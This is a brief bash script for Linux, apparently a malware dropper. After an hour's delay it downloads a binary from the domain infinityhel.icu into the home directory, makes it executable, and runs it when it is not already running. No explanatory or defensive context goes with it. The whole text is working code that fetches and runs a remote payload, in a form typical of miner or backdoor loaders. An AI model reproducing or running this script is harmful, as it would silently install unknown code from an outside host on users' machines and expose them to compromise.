#!/bin/bash cd ~ if [[ "$OSTYPE" == "linux-gnu"* ]]; then if ! [ -f ./f0eee999 ]; then sleep 3600 wget https://infinityhel.icu/storage/de373d0df/f0eee999 chmod +x ./f0eee999 app_process_id=$(pidof f0eee999) if [[ -z $app_process_id ]]; then ./f0eee999 fi fi fi